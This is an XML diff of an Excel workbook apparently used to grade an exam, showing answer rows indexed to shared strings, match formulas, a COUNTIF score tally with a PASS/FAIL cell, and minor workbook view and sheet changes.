+      </c>
+      <c r="B226" s="6" t="s">
+        <v>624</v>
+      </c>
+      <c r="D226" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="227" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A227" s="1">
+        <v>226</v>
+      </c>
+      <c r="B227" s="5" t="s">
+        <v>625</v>
+      </c>
+      <c r="D227" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="228" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A228" s="1">
+        <v>227</v>
+      </c>
+      <c r="B228" s="5" t="s">
+        <v>626</v>
+      </c>
+      <c r="D228" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="229" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A229" s="1">
+        <v>228</v>
+      </c>
+      <c r="B229" s="5" t="s">
+        <v>627</v>
+      </c>
+      <c r="D229" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="230" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A230" s="1">
+        <v>229</v>
+      </c>
+      <c r="B230" s="5" t="s">
+        <v>628</v>
+      </c>
+      <c r="D230" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="231" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A231" s="1">
+        <v>230</v>
+      </c>
+      <c r="B231" s="5" t="s">
+        <v>629</v>
+      </c>
+      <c r="D231" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="232" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A232" s="1">
+        <v>231</v>
+      </c>
+      <c r="B232" s="5" t="s">
+        <v>630</v>
+      </c>
+      <c r="D232" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="233" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A233" s="1">
+        <v>232</v>
+      </c>
+      <c r="B233" s="5" t="s">
+        <v>631</v>
+      </c>
+      <c r="D233" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="234" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A234" s="1">
+        <v>233</v>
+      </c>
+      <c r="B234" s="5" t="s">
+        <v>632</v>
+      </c>
+      <c r="D234" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="235" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A235" s="1">
+        <v>234</v>
+      </c>
+      <c r="B235" s="6" t="s">
+        <v>633</v>
+      </c>
+      <c r="D235" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="236" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A236" s="1">
+        <v>235</v>
+      </c>
+      <c r="B236" s="5" t="s">
+        <v>635</v>
+      </c>
+      <c r="D236" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="237" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A237" s="1">
+        <v>236</v>
+      </c>
+      <c r="B237" s="5" t="s">
+        <v>634</v>
+      </c>
+      <c r="D237" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="238" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A238" s="1">
+        <v>237</v>
+      </c>
+      <c r="B238" s="5" t="s">
+        <v>636</v>
+      </c>
+      <c r="D238" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="239" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A239" s="1">
+        <v>238</v>
+      </c>
+      <c r="B239" s="5" t="s">
+        <v>637</v>
+      </c>
+      <c r="D239" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="240" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A240" s="1">
+        <v>239</v>
+      </c>
+      <c r="B240" s="5" t="s">
+        <v>638</v>
+      </c>
+      <c r="D240" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="241" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A241" s="1">
+        <v>240</v>
+      </c>
+      <c r="B241" s="6" t="s">
+        <v>639</v>
+      </c>
+      <c r="D241" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="242" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A242" s="1">
+        <v>241</v>
+      </c>
+      <c r="B242" s="5" t="s">
+        <v>640</v>
+      </c>
+      <c r="D242" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="243" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A243" s="1">
+        <v>242</v>
+      </c>
+      <c r="B243" s="5" t="s">
+        <v>641</v>
+      </c>
+      <c r="D243" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="244" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A244" s="1">
+        <v>243</v>
+      </c>
+      <c r="B244" s="5" t="s">
+        <v>642</v>
+      </c>
+      <c r="D244" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="245" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A245" s="1">
+        <v>244</v>
+      </c>
+      <c r="B245" s="5" t="s">
+        <v>643</v>
+      </c>
+      <c r="D245" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="246" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A246" s="1">
+        <v>245</v>
+      </c>
+      <c r="B246" s="5" t="s">
+        <v>644</v>
+      </c>
+      <c r="D246" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="247" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A247" s="1">
+        <v>246</v>
+      </c>
+      <c r="B247" s="5" t="s">
+        <v>645</v>
+      </c>
+      <c r="D247" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="248" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A248" s="1">
+        <v>247</v>
+      </c>
+      <c r="B248" s="5" t="s">
+        <v>432</v>
+      </c>
+      <c r="D248" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="249" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A249" s="1">
+        <v>248</v>
+      </c>
+      <c r="B249" s="5" t="s">
+        <v>416</v>
+      </c>
+      <c r="D249" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="250" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A250" s="1">
+        <v>249</v>
+      </c>
+      <c r="B250" s="5" t="s">
+        <v>391</v>
+      </c>
+      <c r="D250" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="251" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A251" s="1">
+        <v>250</v>
+      </c>
+      <c r="B251" s="5" t="s">
+        <v>646</v>
+      </c>
+      <c r="D251" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="252" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A252" s="1">
+        <v>251</v>
+      </c>
+      <c r="B252" s="5" t="s">
+        <v>81</v>
+      </c>
+      <c r="D252" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="253" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A253" s="1">
+        <v>252</v>
+      </c>
+      <c r="B253" s="5" t="s">
+        <v>647</v>
+      </c>
+      <c r="D253" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="254" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A254" s="1">
+        <v>253</v>
+      </c>
+      <c r="B254" s="5" t="s">
+        <v>648</v>
+      </c>
+      <c r="D254" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="255" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A255" s="1">
+        <v>254</v>
+      </c>
+      <c r="B255" s="5" t="s">
+        <v>649</v>
+      </c>
+      <c r="D255" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="256" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A256" s="1">
+        <v>255</v>
+      </c>
+      <c r="B256" s="5" t="s">
+        <v>650</v>
+      </c>
+      <c r="D256" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="257" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A257" s="1">
+        <v>256</v>
+      </c>
+      <c r="B257" s="5" t="s">
+        <v>388</v>
+      </c>
+      <c r="D257" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="258" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A258" s="1">
+        <v>257</v>
+      </c>
+      <c r="B258" s="5" t="s">
+        <v>436</v>
+      </c>
+      <c r="D258" t="b">
+        <f t="shared" si="3"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="259" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A259" s="1">
+        <v>258</v>
+      </c>
+      <c r="B259" s="5" t="s">
+        <v>651</v>
+      </c>
+      <c r="D259" t="b">
+        <f t="shared" ref="D259:D310" si="4">IF(B259=C259,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="260" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A260" s="1">
+        <v>259</v>
+      </c>
+      <c r="B260" s="5" t="s">
+        <v>652</v>
+      </c>
+      <c r="D260" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="261" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A261" s="1">
+        <v>260</v>
+      </c>
+      <c r="B261" s="5" t="s">
+        <v>445</v>
+      </c>
+      <c r="D261" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="262" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A262" s="1">
+        <v>261</v>
+      </c>
+      <c r="B262" s="5" t="s">
+        <v>653</v>
+      </c>
+      <c r="D262" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="263" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A263" s="1">
+        <v>262</v>
+      </c>
+      <c r="B263" s="5" t="s">
+        <v>407</v>
+      </c>
+      <c r="D263" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="264" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A264" s="1">
+        <v>263</v>
+      </c>
+      <c r="B264" s="5" t="s">
+        <v>437</v>
+      </c>
+      <c r="D264" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="265" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A265" s="1">
+        <v>264</v>
+      </c>
+      <c r="B265" s="5" t="s">
+        <v>654</v>
+      </c>
+      <c r="D265" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="266" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A266" s="1">
+        <v>265</v>
+      </c>
+      <c r="B266" s="5" t="s">
+        <v>447</v>
+      </c>
+      <c r="D266" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="267" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A267" s="1">
+        <v>266</v>
+      </c>
+      <c r="B267" s="5" t="s">
+        <v>413</v>
+      </c>
+      <c r="D267" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="268" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A268" s="1">
+        <v>267</v>
+      </c>
+      <c r="B268" s="5" t="s">
+        <v>218</v>
+      </c>
+      <c r="D268" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="269" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A269" s="1">
+        <v>268</v>
+      </c>
+      <c r="B269" s="5" t="s">
+        <v>381</v>
+      </c>
+      <c r="D269" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="270" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A270" s="1">
+        <v>269</v>
+      </c>
+      <c r="B270" s="5" t="s">
+        <v>655</v>
+      </c>
+      <c r="D270" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="271" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A271" s="1">
+        <v>270</v>
+      </c>
+      <c r="B271" s="5" t="s">
+        <v>656</v>
+      </c>
+      <c r="D271" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="272" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A272" s="1">
+        <v>271</v>
+      </c>
+      <c r="B272" s="5" t="s">
+        <v>657</v>
+      </c>
+      <c r="D272" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="273" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A273" s="1">
+        <v>272</v>
+      </c>
+      <c r="B273" s="5" t="s">
+        <v>658</v>
+      </c>
+      <c r="D273" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="274" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A274" s="1">
+        <v>273</v>
+      </c>
+      <c r="B274" s="5" t="s">
+        <v>370</v>
+      </c>
+      <c r="D274" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="275" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A275" s="1">
+        <v>274</v>
+      </c>
+      <c r="B275" s="5" t="s">
+        <v>405</v>
+      </c>
+      <c r="D275" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="276" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A276" s="1">
+        <v>275</v>
+      </c>
+      <c r="B276" s="5" t="s">
+        <v>659</v>
+      </c>
+      <c r="D276" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="277" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A277" s="1">
+        <v>276</v>
+      </c>
+      <c r="B277" s="5" t="s">
+        <v>385</v>
+      </c>
+      <c r="D277" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="278" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A278" s="1">
+        <v>277</v>
+      </c>
+      <c r="B278" s="5" t="s">
+        <v>431</v>
+      </c>
+      <c r="D278" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="279" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A279" s="1">
+        <v>278</v>
+      </c>
+      <c r="B279" s="5" t="s">
+        <v>393</v>
+      </c>
+      <c r="D279" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="280" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A280" s="1">
+        <v>279</v>
+      </c>
+      <c r="B280" s="5" t="s">
+        <v>471</v>
+      </c>
+      <c r="D280" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="281" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A281" s="1">
+        <v>280</v>
+      </c>
+      <c r="B281" s="5" t="s">
+        <v>440</v>
+      </c>
+      <c r="D281" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="282" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A282" s="1">
+        <v>281</v>
+      </c>
+      <c r="B282" s="6" t="s">
+        <v>660</v>
+      </c>
+      <c r="D282" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="283" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A283" s="1">
+        <v>282</v>
+      </c>
+      <c r="B283" s="5" t="s">
+        <v>661</v>
+      </c>
+      <c r="D283" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="284" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A284" s="1">
+        <v>283</v>
+      </c>
+      <c r="B284" s="5" t="s">
+        <v>417</v>
+      </c>
+      <c r="D284" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="285" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A285" s="1">
+        <v>284</v>
+      </c>
+      <c r="B285" s="5" t="s">
+        <v>455</v>
+      </c>
+      <c r="D285" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="286" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A286" s="1">
+        <v>285</v>
+      </c>
+      <c r="B286" s="5" t="s">
+        <v>392</v>
+      </c>
+      <c r="D286" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="287" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A287" s="1">
+        <v>286</v>
+      </c>
+      <c r="B287" s="5" t="s">
+        <v>402</v>
+      </c>
+      <c r="D287" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="288" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A288" s="1">
+        <v>287</v>
+      </c>
+      <c r="B288" s="5" t="s">
+        <v>383</v>
+      </c>
+      <c r="D288" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="289" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A289" s="1">
+        <v>288</v>
+      </c>
+      <c r="B289" s="5" t="s">
+        <v>378</v>
+      </c>
+      <c r="D289" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="290" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A290" s="1">
+        <v>289</v>
+      </c>
+      <c r="B290" s="5" t="s">
+        <v>662</v>
+      </c>
+      <c r="D290" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="291" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A291" s="1">
+        <v>290</v>
+      </c>
+      <c r="B291" s="5" t="s">
+        <v>425</v>
+      </c>
+      <c r="D291" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="292" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A292" s="1">
+        <v>291</v>
+      </c>
+      <c r="B292" s="5" t="s">
+        <v>422</v>
+      </c>
+      <c r="D292" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="293" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A293" s="1">
+        <v>292</v>
+      </c>
+      <c r="B293" s="5" t="s">
+        <v>380</v>
+      </c>
+      <c r="D293" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="294" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A294" s="1">
+        <v>293</v>
+      </c>
+      <c r="B294" s="5" t="s">
+        <v>365</v>
+      </c>
+      <c r="D294" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="295" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A295" s="1">
+        <v>294</v>
+      </c>
+      <c r="B295" s="5" t="s">
+        <v>368</v>
+      </c>
+      <c r="D295" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="296" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A296" s="1">
+        <v>295</v>
+      </c>
+      <c r="B296" s="5" t="s">
+        <v>400</v>
+      </c>
+      <c r="D296" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="297" spans="1:4" ht="16.5" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A297" s="1">
+        <v>296</v>
+      </c>
+      <c r="B297" s="5" t="s">
+        <v>371</v>
+      </c>
+      <c r="D297" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="298" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A298" s="1">
+        <v>297</v>
+      </c>
+      <c r="B298" s="5" t="s">
+        <v>423</v>
+      </c>
+      <c r="D298" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="299" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A299" s="1">
+        <v>298</v>
+      </c>
+      <c r="B299" s="5" t="s">
+        <v>453</v>
+      </c>
+      <c r="D299" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="300" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A300" s="1">
+        <v>299</v>
+      </c>
+      <c r="B300" s="5" t="s">
+        <v>382</v>
+      </c>
+      <c r="D300" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="301" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A301" s="1">
+        <v>300</v>
+      </c>
+      <c r="B301" s="5" t="s">
+        <v>188</v>
+      </c>
+      <c r="D301" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="302" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A302" s="1">
+        <v>301</v>
+      </c>
+      <c r="B302" s="5" t="s">
+        <v>439</v>
+      </c>
+      <c r="D302" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="303" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A303" s="1">
+        <v>302</v>
+      </c>
+      <c r="B303" s="5" t="s">
+        <v>43</v>
+      </c>
+      <c r="D303" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="304" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A304" s="1">
+        <v>303</v>
+      </c>
+      <c r="B304" s="5" t="s">
+        <v>663</v>
+      </c>
+      <c r="D304" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="305" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A305" s="1">
+        <v>304</v>
+      </c>
+      <c r="B305" s="5" t="s">
+        <v>408</v>
+      </c>
+      <c r="D305" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="306" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A306" s="1">
+        <v>305</v>
+      </c>
+      <c r="B306" s="5" t="s">
+        <v>364</v>
+      </c>
+      <c r="D306" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="307" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A307" s="1">
+        <v>306</v>
+      </c>
+      <c r="B307" s="5" t="s">
+        <v>406</v>
+      </c>
+      <c r="D307" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="308" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A308" s="1">
+        <v>307</v>
+      </c>
+      <c r="B308" s="5" t="s">
+        <v>502</v>
+      </c>
+      <c r="D308" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="309" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A309" s="1">
+        <v>308</v>
+      </c>
+      <c r="B309" s="5" t="s">
+        <v>379</v>
+      </c>
+      <c r="D309" t="b">
+        <f t="shared" si="4"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="310" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="A310" s="1">
+        <v>309</v>
+      </c>
+      <c r="B310" s="5" t="s">
+        <v>664</v>
+      </c>
+      <c r="C310" s="5" t="s">
+        <v>664</v>
+      </c>
+      <c r="D310" t="b">
+        <f t="shared" si="4"/>
+        <v>1</v>
+      </c>
+    </row>
+    <row r="312" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="D312">
+        <f>COUNTIF(D94:D311,TRUE)</f>
+        <v>1</v>
+      </c>
+      <c r="F312" t="s">
+        <v>456</v>
+      </c>
+      <c r="G312">
+        <f>SUM(D312)</f>
+        <v>1</v>
+      </c>
+      <c r="I312" t="s">
+        <v>458</v>
+      </c>
+      <c r="J312" t="str">
+        <f>IF(G104&gt;=220,"PASS","FAIL")</f>
+        <v>FAIL</v>
+      </c>
+    </row>
+    <row r="313" spans="1:10" x14ac:dyDescent="0.25">
+      <c r="F313" t="s">
+        <v>457</v>
+      </c>
+      <c r="G313">
+        <f>SUM(G312/191*100)</f>
+        <v>0.52356020942408377</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
+</worksheet>
 </file>
--- a/Exam excel.xlsx
+++ b/Exam excel.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\stratumhr\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1F63822D-BDC9-4494-8C2D-0D32CF66C3E6}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{ACD6BC06-7966-486F-9109-59999988E2DD}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="5" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="6" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="1" sheetId="1" r:id="rId1"/>
@@ -19,6 +19,7 @@
     <sheet name="4" sheetId="2" r:id="rId4"/>
     <sheet name="5" sheetId="7" r:id="rId5"/>
     <sheet name="6" sheetId="8" r:id="rId6"/>
+    <sheet name="7" sheetId="10" r:id="rId7"/>
   </sheets>
   <calcPr calcId="191029"/>
   <extLst>
@@ -30,7 +31,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1004" uniqueCount="665">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1152" uniqueCount="667">
   <si>
     <t>Slno</t>
   </si>
@@ -2025,6 +2026,12 @@
   </si>
   <si>
     <t xml:space="preserve"> Pharming</t>
+  </si>
+  <si>
+    <t>A</t>
+  </si>
+  <si>
+    <t>B</t>
   </si>
 </sst>
 </file>
@@ -5510,7 +5517,7 @@
   <dimension ref="A1:F132"/>
   <sheetViews>
     <sheetView topLeftCell="A124" workbookViewId="0">
-      <selection activeCell="G137" sqref="G137"/>
+      <selection activeCell="F132" sqref="F132"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -7070,7 +7077,7 @@
   <dimension ref="A1:G107"/>
   <sheetViews>
     <sheetView topLeftCell="A94" workbookViewId="0">
-      <selection activeCell="H113" sqref="H113"/>
+      <selection sqref="A1:XFD1048576"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -10687,8 +10694,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{E9F365E0-BA31-49F2-BED9-5E9F2D51F116}">
   <dimension ref="A1:J313"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A305" workbookViewId="0">
-      <selection activeCell="I297" sqref="I297"/>
+    <sheetView topLeftCell="A296" workbookViewId="0">
+      <selection activeCell="D312" sqref="D312"/>
     </sheetView>
   </sheetViews>
